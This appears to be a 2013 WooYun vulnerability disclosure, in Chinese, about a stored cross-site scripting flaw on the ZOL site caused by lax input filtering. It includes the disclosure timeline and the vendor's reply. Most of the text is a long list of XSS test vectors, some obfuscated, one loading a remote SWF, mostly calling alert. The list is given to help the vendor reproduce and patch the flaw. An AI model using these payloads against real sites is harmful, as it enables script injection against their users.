乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-16: 细节已通知厂商并且等待厂商处理中 2013-09-16: 厂商已经确认,细节仅向厂商公开 2013-09-26: 细节向核心白帽子及相关领域专家公开 2013-10-06: 细节向普通白帽子公开 2013-10-16: 细节向实习白帽子公开 2013-10-31: 细节向公众公开
过滤不严。
过滤不言导致可通过抓改包植入恶意的xss代码。
由于是多个xss vector同时插入测试的,所以不确定是完全没有过滤,还是正则被打乱了在这儿提供1下我平时做xss测试的vectors.方便审核人员场景重现,zol也可以作为漏洞修补的参考
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script><script>alert([!![]]+[])</script><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script><script>prompt(-[])</script><script firefox>alert(1)</script> <SCRIPT>+alert("2")</SCRIPT> <script>alert(/3/)</script><script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/4/)></script><script/src=data:text/javascript,alert(5)></script> ? <script>alert(String.fromCharCode(49))</script><script>alert(/7/.source)</script><script>setTimeout('alert(8)',0)</script><button/onclick=alert(9) >KCF</button> <form><button formaction=javascript:alert(10)>CLICKME <a href=javascript:confirm(11)>asd</a><a onmouseover=(alert(12))>KCF</a> <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(13)>ClickMe<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a> </svg><p/onmouseover=javascript:alert(15); >KCF</p> <img src=x onerror=alert(16)> <img src ?itworksonchrome?\/onerror = alert(17)> <img src=x onerror=window.open('http://18.com');> <img/src/onerror=alert(19)> <img src="x:kcf" onerror="alert(20)"><body/onload=alert(21)><body onscroll=alert(22)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus><body oninput=alert(23)><input autofocus><var onmouseover="prompt(24)">KCF</var><div/onmouseover='alert(25)'>X<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																26
																	%29></iframe><iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	29	%29></iframe><iframe SRC="http://0x.lv/xss.swf"></iframe> <IFRAME SRC="javascript:alert(27);"></IFRAME><meta http-equiv="refresh" content="0;javascript:alert(28)"/>? <meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E"><object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object><marquee onstart="alert('31')"></marquee><isindex type=image src=1 onerror=alert(32)><isindex action=javascript:alert(33) type=image><input onfocus=javascript:alert(34) autofocus><input onblur=javascript:alert(35) autofocus><input autofocus><select onfocus=javascript:alert(36) autofocus><textarea onfocus=javascript:alert(37) autofocus><keygen onfocus=javascript:alert(38) autofocus><FRAMESET><FRAME SRC="javascript:alert(39);"></FRAMESET><frameset onload=alert(40)><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4="></embed> <embed src=javascript:alert(42)> <svg onload="javascript:alert(43)" xmlns="http://www.w3.org/2000/svg"></svg><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(44)"></g></svg> <math href="javascript:javascript:alert(45)">CLICKME</math><video><source onerror="alert(46)"><audio src=x onerror=alert(47)><video src=x onerror=alert(48)>
辛苦了。
危害等级:低
漏洞Rank:5
确认时间:2013-09-16 11:07
我去跟负责人沟通下,这个问题之前与他们聊过,不能完全屏蔽掉全部标签,感谢提交
暂无